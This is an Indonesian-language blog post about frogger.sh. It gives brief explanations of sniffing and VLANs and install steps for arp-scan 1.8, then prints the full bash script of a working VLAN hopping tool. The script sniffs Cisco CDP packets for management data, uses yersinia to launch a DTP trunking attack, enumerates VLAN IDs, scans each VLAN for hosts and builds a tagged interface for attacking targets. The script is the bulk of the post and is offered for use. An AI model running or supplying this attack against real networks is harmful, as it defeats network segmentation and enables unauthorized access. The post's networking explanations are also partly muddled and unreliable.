Kali ini saya akan membahas mengenai frogger.sh yang saya temukan pada situs official nya disini, Baiklah kita akan berbicara mengenai fungsi dari frogger ini, frogger berfungsi untuk sniffer paket-paket yang ada pada Virtual Local Area Network (Vlan) yang menghendus paket-paket dalam Cisco Discovery Protocol (CDP).
Jika anda belum tau apa itu sniffer, akan saya jelaskan disini juga.
Sniffer adalah pelaku/penyerang yang melakukan penghendusan atau
penangkapan paket-paket data sebuah jaringan (itu menurut saya), mungkin
arti lebih luasnya anda bisa mencoba mencari didalam search engine
VLAN adalah sebuah grup dari segmentasi dalam LAN yang berbasiskan internet protocol (IP) atau biasanya diartikan sebagai segmentasi IP yang digunakan sebagai pengalamatan komputer. Analoginya
jigak suatu jaringan dibentuk maka seorang network engineer harus
menciptakan pengalamatan yang digunakan sebagain alamat jaringan (ya
kayak nomer hape gitulah). Namun
jika menggunakan switch yang jenis unmanaged(no VLAN supported) maka
hanya ada 1 collision domain. Ini sangat tidak efisien sekali digunakan
dan mengakibatkan sering terjadinya conflict antar IP yang merugikan
user dalam pemakaian resource jaringan. Untuk itu diperlukan suatu segmentasi dalam IP address
yang berguna mencegah terjadinya collision domain. Hal ini hanya dapat
diwujudkan dengan adanya VLAN yang bertindak seolah-olah ada segmen
lain dalam 1 switch. Kegunaan VLAN :
- Mencegah terjadinya collision domain
- Mempersempit kemungkinan terjadinya conflict IP yang terlalu banyak
- Mengurangi tingkat vulnerabilities
kita akan membahas bagaimana cara menjalankan tool frogger.sh yang
berbasis bash ini, perlu anda ketahui jika anda menggunakan distro
backtrack arp telah terinstal default dengan versi arp-1.6. Akan tetapi
frogger akan berjalan di arp-1.8, maka dari itu anda bisa menginstalnya
terlebih dahulu dengan cara:
- Download arp-1.8 disini
- ekstrak arp yang udah diinstal tadi
- masuk kedalam direktori arp yang telah di ekstrak lalu instal dengan cara
- ./configure
- make
- make install
sekarang arp-1.8 anda telah terinstal, cek di terminal dengan perintah
arp --version untuk melihat versi barunya. kemudian download tool
frogger.sh disini ekstrak
dan jalankan, anda bisa melihat sendiri tutorial video dibawah ini
serta lampiran script froggernya. Selamat belajar (^_^)
source:#!/usr/bin/env bash# Frogger - The VLAN Hopper script# Daniel Compton# www.commonexploits.com# contact@commexploits.com# Twitter = @commonexploits# 28/11/2012# Requires arp-scan >= 1.8 for VLAN tagging, yersinia, tshark and screen# Tested on Bactrack 5 with Cisco devices - it can be used over SSHVERSION="1.4"# User configuration SettingsTAGSEC="90" #change this value for the number of seconds to sniff for 802.1Q tagged packetsCDPSEC="90" # change this value for the number of seconds to sniff for CDP packetsDTPWAIT="20" # amount of time to wait for DTP attack via yersinia to trigger# Variables needed throughout execution, do not touchMANDOM=""NATID=""DEVID=""MANIP=""# Script startsARPVER="`arp-scan -V 2>&1 | grep \"arp-scan [0-9]\" | cut -f 2 -d\" \"`"clearecho -e "\e[00;32m########################################################\e[00m"echo "*** Frogger - The VLAN Hopper Version $VERSION ***"echo "*** Auto enumerates VLANs and Discovers devices ***"echo -e "\e[00;32m########################################################\e[00m"echo ""echo -e "\e[00;34m-------------------------------------------\e[00m"echo "Checking dependencies"echo -e "\e[00;34m-------------------------------------------\e[00m"#Check for yersiniawhich yersinia >/dev/nullif [ $? -eq 0 ]thenecho ""echo -e "\e[00;32mI have found the required Yersinia program\e[00m"elseecho ""echo -e "\e[00;31mUnable to find the required Yersinia program, install and try again\e[00m"exit 1fi#Check for tsharkwhich tshark >/dev/nullif [ $? -eq 0 ]thenecho ""echo -e "\e[00;32mI have found the required tshark program\e[00m"elseecho ""echo -e "\e[00;31mUnable to find the required tshark program, install and try again\e[00m"echo ""exit 1fi#Check for screenwhich screen >/dev/nullif [ $? -eq 0 ]thenecho ""echo -e "\e[00;32mI have found the required screen program\e[00m"elseecho ""echo -e "\e[00;31mUnable to find the required screen program, install and try again\e[00m"echo ""exit 1fi#Check for arpscanwhich arp-scan >/dev/nullif [ $? -eq 1 ]thenecho -e "\e[00;31mUnable to find the required arp-scan program, install at least version 1.8 and try again. Download from www.nta-monitor.com\e[00m"echo ""exit 1elsecompare_arpscan="`echo "$ARPVER < 1.8" | bc`"if [ $compare_arpscan -eq 1 ]; thenecho ""echo -e "\e[00;31mUnable to find version 1.8 of arp-scan, 1.8 is required for VLAN tagging. Install at least version 1.8 and try again. Download from www.nta-monitor.com\e[00m"exit 1elseecho ""echo -e "\e[00;32mI have found the required version of arp-scan\e[00m"fifiecho ""echo "----------------------------------- Settings -------------------------------------"echo ""echo -e "Sniffer settings for CDP are set to \e[00;32m$CDPSEC\e[00m seconds"echo ""echo -e "Sniffer settings for tagged packets are set to \e[00;32m$TAGSEC\e[00m seconds"echo ""echo "----------------------------------------------------------------------------------"echo -e " Press ENTER to continue or CTRL-C to cancel... \c"read enterkeyclearecho -e "\e[1;33m----------------------------------------\e[00m"echo "The following Interfaces are available"echo -e "\e[1;33m----------------------------------------\e[00m"ifconfig | grep -o "eth.*" |cut -d " " -f1echo -e "\e[1;31m--------------------------------------------------\e[00m"echo "Enter the interface to scan from as the source"echo -e "\e[1;31m--------------------------------------------------\e[00m"read INTifconfig | grep -i -w $INT >/dev/nullif [ $? = 1 ]thenecho ""echo -e "\e[1;31mSorry the interface you entered does not exist! - check and try again.\e[00m"echo ""exit 1elseecho ""ficlearecho ""echo -e "\e[1;33mNow Sniffing CDP Packets on $INT - Please wait for "$CDPSEC" seconds...\e[00m"echo ""OUTPUT="`tshark -a duration:$CDPSEC -i $INT -R \"cdp\" -V 2>&1 | sort --unique`"printf -- "${OUTPUT}\n" | while read linedocase "${line}" inVTP\ Management\ Domain:*)if [ -n "$MANDOM" ]thencontinuefiMANDOM="`printf -- \"${line}\n\" | cut -f2 -d\":\"`"if [ "$MANDOM" = "Domain:" ]thenecho -e "\e[1;33mThe VTP domain appears to be set to NULL on the device. Script will continue..\e[00m"echo ""echo -e "\e[1;33mPress the Enter key to continue\e[00m"read enterkeyelif [ -z "$MANDOM" ]thenecho -e "\e[1;33mI didn't find any VTP management domain within CDP packets. Possibly CDP is not enabled. Script will continue..\e[00m"echo ""echo -e "\e[1;33mPress the Enter key to continue\e[00m"read enterkeyelseecho -e "\e[1;33m----------------------------------------------------------\e[00m"echo "The following Management domains were found"echo -e "\e[1;33m----------------------------------------------------------\e[00m"echo -e "\e[00;32m$MANDOM\e[00m"echo ""fi;;Native\ VLAN:*)if [ -n "$NATID" ]thencontinuefiNATID="`printf -- \"${line}\n\" | cut -f2 -d\":\"`"if [ -z "$NATID" ]thenecho -e "\e[1;33mI didn't find any Native VLAN ID within CDP packets. Perhaps CDP is not enabled.\e[00m"echo ""echo -e "\e[1;33mPress the Enter key to continue\e[00m"read enterkeyelseecho -e "\e[1;33m------------------------------------------------\e[00m"echo "The following Native VLAN ID was found"echo -e "\e[1;33m------------------------------------------------\e[00m"echo -e "\e[00;32m$NATID\e[00m"echo ""fi;;*RELEASE\ SOFTWARE*)if [ -n "$DEVID" ]thencontinuefiDEVID="`printf -- \"${line}\n\" | awk '{sub(/^[ \t]+/, ""); print}'`"if [ -z "$DEVID" ]thenecho -e "\e[1;33mI didn't find any devices. Perhaps it is not a Cisco device.\e[00m"echo ""echo -e "\e[1;33mPress the Enter key to continue\e[00m"read enterkeyelseecho -e "\e[1;33m------------------------------------------------\e[00m"echo "The following Cisco device was found"echo -e "\e[1;33m------------------------------------------------\e[00m"echo -e "\e[00;32m$DEVID\e[00m"echo ""fi;;IP\ address:*)if [ -n "$MANIP" ]thencontinuefiMANIP="`printf -- \"${line}\n\" | cut -f2 -d\":\"`"if [ -z "$MANIP" ]thenecho -e "\e[00;31mI didn't find any management addresses within CDP packets. Try increasing the CDP time and try again!\e[00m"exitelseecho -e "\e[1;33m---------------------------------------------------\e[00m"echo "The following Management IP Addresses were found"echo -e "\e[1;33m---------------------------------------------------\e[00m"echo -e "\e[00;32m$MANIP\e[00m"echo $MANIP >MANIPTMPecho ""fi;;esacdoneecho ""echo -e "\e[1;33mNow Running DTP Attack on interface $INT, waiting "$DTPWAIT" seconds to trigger\e[00m"echo ""screen -d -m -S yersina_dtp yersinia dtp -attack 1 -interface $INTsleep $DTPWAIT#clearecho ""echo -e "\e[1;33mNow Extracting VLAN IDs on interface $INT, sniffing 802.1Q tagged packets for "$TAGSEC" seconds...\e[00m"echo ""VLANIDS=`tshark -a duration:$TAGSEC -i $INT -R "vlan" -x -V 2>&1 |grep -o " = ID: .*" |awk '{ print $NF }' | sort --unique`#clearif [ -z "$VLANIDS" ]thenecho -e "\e[00;31mI didn't find any VLAN IDs within 802.1Q tagged packets. Try increasing the tagged time (TAGSEC) and try again!\e[00m"exit 1elseecho -e "\e[1;33m------------------------------------\e[00m"echo "The following VLAN IDs were found"echo -e "\e[1;33m------------------------------------\e[00m"echo -e "\e[00;32m$VLANIDS\e[00m"echo -e "\e[1;33m------------------------------------\e[00m"echo ""echo -e "Press ENTER to continue and scan VLANs for live devices"firead enterkeyclearSCANSDTP=$(cat MANIPTMP |cut -d "." -f 1,2,3)echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"echo "Enter the IP address or CIDR range you wish to scan i.e or"echo ""echo "Looking at the management address, try to scan "$SCANSDTP".0/24"echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"read IPADDRESSrm MANIPTMP 2>&1 >/dev/nullclearfor VLANIDSCAN in $(echo "$VLANIDS")doecho -e "\e[1;33m---------------------------------------------------------------------------\e[00m"echo -e "Now scanning \e[00;32m$IPADDRESS - VLAN $VLANIDSCAN\e[00m for live devices"echo -e "\e[1;33m---------------------------------------------------------------------------\e[00m"arp-scan -Q $VLANIDSCAN -I $INT $IPADDRESS -t 500 2>&1 |grep "802.1Q VLAN="if [ $? = 0 ]thenecho -e "\e[00;32mDevices were found in VLAN "$VLANIDSCAN"\e[00m"elseecho -e "\e[01;31mNo devices found in VLAN "$VLANIDSCAN"\e[00m"fidone#Menu choice for creating VLAN interfaceecho ""echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"showMenu () {echo "1) Select 1 to create a new local VLAN Interface for attacking the target"echo "2) Select 2 to exit script - this will kill all processes"echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"}while [ 1 ]doshowMenuread CHOICEcase "$CHOICE" in"1")echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"echo "Enter the VLAN ID to Create"echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"read VIDecho -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"echo "Enter the IP address you wish to assign to the new VLAN interface $VID i.e"echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"read VIPmodprobe 8021qvconfig add $INT $VIDifconfig $INT.$VID upifconfig $INT.$VID $VIPecho -e "\e[1;32m--------------------------------------------------------------------------------------------------\e[00m"echo "The following interface is now configured locally"echo "#################################################################################################"echo -e "Interface \e[1;32m$INT.$VID\e[00m with IP Address \e[1;32m$VIP\e[00m"echo "#################################################################################################"echo -e "\e[1;32m----------------------------------------------------------------------------------------------------\e[00m";;"2")ps -ef | grep "[Yy]ersinia dtp" >/dev/nullif [ $? = 0 ]thenkillall yersiniaecho -e "\e[1;32mDTP attack has been stopped\e[00m"exit 1elseexit 1fi;;esacdone#END
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